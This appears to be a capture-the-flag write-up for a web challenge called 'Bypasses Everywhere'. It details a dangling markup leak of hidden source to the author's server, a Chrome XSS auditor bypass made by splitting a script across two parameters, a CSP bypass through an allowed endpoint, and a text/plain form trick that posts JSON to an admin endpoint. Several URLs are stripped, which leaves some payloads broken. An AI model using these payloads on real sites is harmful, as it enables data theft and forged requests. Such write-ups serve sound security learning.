Skip to content
This repository has been archived by the owner. It is now read-only.
Switch branches/tags
Go to file
Cannot retrieve contributors at this time

Bypasses Everywhere - writeup

Dangling markup - leaking code source

At we are being told that if this page is accessed from we should be able to see more interesting stuff.

On the same page there is a vulnerable parameter picture which leads to a dangling markup attack:"><img src='

By submitting this url to the "admin" we can leak the hidden content: POST ; ; data: "url="><img src='"

Soon enough we will get on our server the content of the server-files/ file.


Now we know that our goal is to POST a JSON payload to the /article endpoint.

To do this we will need an XSS, the injection we have on is not sufficient because the "admin" is actually a chromium-headless browser (you can see it in the User-Agent header). So the XSS auditor is blocking the injection (at least I don't know any bypass, please tell me if I'm wrong on twitter: @HugoDelval)

Another endpoint is vulnerable to XSS the /article endpoint, its specificity is that there are 2 parameters that are vulnerables, which leads to an XSS auditor bypass:<script>al&unit=ert()</script>


The previous XSS bypass would normally work BUT the website is also protected by a CSP: script-src: Which means that our payload, which could have done the POST we want to fetch the flag, won't work here. If you open the developper console on chromium at<script>al&unit=ert()</script> you'll see the error.

Hopefully CSP can be bypassed (wow really? you didn't see it comming, right?). Here is a really good paper about this:

The only URL endpoint I've found on the subdomain is this one: (again if you have others I would love to know :D). Which mean that our previous XSS payload can be written as:<script src=https://ww>&></script>

\o/ Hurray! XSS!

Posting "JSON"

The last step is to post a json-like payload to the /admin endpoint. Here how I did it:

<form method=post enctype=text/plain>
	<input name='{"secret":"No one will never ever access this beauty","url":"","a":"' value='"}'>

Which will post:

	"secret": "No one will never ever access this beauty",
	"url": "",
	"a": "="

Wrapping it all together

To solve this challenge we need to submit this URL to the admin:<form method=post enctype=text/plain><input name='{"secret":"No one will never ever access this beauty","url":"","a":"' value='"}'></form><script src=https://ww&[0].submit></script>

Which will:

  1. Fetch the page on the local url (the chromium-headless admin is running on localhost)
  2. Bypass the chrome XSS auditor (splitting the payload into 2 url parameters)
  3. Bypass the CSP using
  4. Post a JSON payload using the enctype=text/plain trick


Thanks for reading.

I hope this writeup is clear enough :) if not, please reach out -> twitter@HugoDelval